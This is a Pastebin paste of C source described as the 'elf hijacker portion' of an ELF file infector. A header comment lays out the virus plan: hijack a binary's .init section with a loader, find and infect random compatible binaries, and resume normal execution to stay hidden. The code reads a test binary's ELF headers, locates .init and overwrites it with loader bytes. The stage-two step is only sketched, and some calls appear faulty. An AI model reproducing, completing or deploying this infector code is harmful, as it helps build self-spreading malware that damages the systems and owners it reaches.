API tools faq
paste
Advertisement
Madmouse

elf hijacker portion of the elf infector

Madmouse
Dec 31st, 2015
149
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.74 KB | None | 0 0
raw download clone embed print report
  1. ////////////////////////////////////////////////////////////////////////////////
  2. // THE SCOTCH-WARE LICENSE (Revision 0):
  3. // <aaronryool/gmail.com> wrote this file. As long as you retain this notice you
  4. // can do whatever you want with this stuff. If we meet some day, and you think
  5. // this stuff is worth it, you can buy me a shot of scotch in return
  6. ////////////////////////////////////////////////////////////////////////////////
  7. //
  8. // The idea is basically to hijack the .init section, use the 27 bytes of
  9. // __init for the first stage loader, which will set up the environment for stage
  10. //  two, which will save the state of the program entry, randomly search for a
  11. // binary to latch onto, infect a random compatible binary, and then clean up,
  12. // restore the entry state, jmp into a reimplementation of __init, and continue
  13. // normal program execution...
  14.  
  15.  
  16. #include <string.h>
  17. #include <malloc.h>
  18. #include <stdio.h>
  19. #include <elf.h>
  20.  
  21. typedef struct target {
  22.     Elf64_Ehdr* eheader;
  23.     Elf64_Shdr* sheader;
  24.     Elf64_Phdr* pheader;
  25.     char* shstable;
  26. } target_t;
  27.  
  28.  
  29. // code in payload.s
  30. extern const void* loader;
  31.  
  32. int main(int argc, char** argv)
  33. {
  34.     target_t target;
  35.  
  36.     // open test binary
  37.     FILE* file = fopen("./yay", "rw+");
  38.  
  39.     // read in its elf header
  40.     target.eheader = malloc(sizeof(Elf64_Ehdr));
  41.     fread(target.eheader, sizeof(Elf64_Ehdr), 1, file);
  42.  
  43.     // see to section header offset
  44.     fseek(file, target.eheader->e_shoff, SEEK_SET);
  45.  
  46.     // read in section header
  47.     target.sheader = malloc(sizeof(Elf64_Shdr) * target.eheader->e_shnum);
  48.     fread(target.sheader, sizeof(Elf64_Shdr), target.eheader->e_shnum, file);
  49.  
  50.  
  51.     // read in section header string table section header entry
  52.     Elf64_Shdr* stsh = target.sheader + target.eheader->e_shstrndx;
  53.  
  54.     // seek to the string table itself
  55.     fseek(file, stsh->sh_offset, SEEK_SET);
  56.  
  57.     // read in the section header strings table
  58.     target.shstable = malloc(stsh->sh_size);
  59.     fread(target.shstable, stsh->sh_size, 1, file);
  60.  
  61.     // search for the ".init" section
  62.     for(int i = 0;i < target.eheader->e_shnum;i++, target.sheader++)
  63.     {
  64.         char* name = target.shstable + target.sheader->sh_name;
  65.         if(strcmp(name, ".init") == 0)
  66.         {
  67.             // rudely shove the loader into .init, and print out stuff about it
  68.             printf("%s: offset: %lx, size: %li\n", name, target.sheader->sh_offset, target.sheader->sh_size);
  69.             fseek(file, target.sheader->sh_offset, SEEK_SET);
  70.             fwrite(&loader, 1, 8, file);
  71.         }
  72.     }
  73.     // seek to end of file
  74.     fseek(file, 0, SEEK_END);
  75.  
  76.     // write the stage two object to the end of the file, and prepare it for its new host
  77.  
  78.     return 0;
  79. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!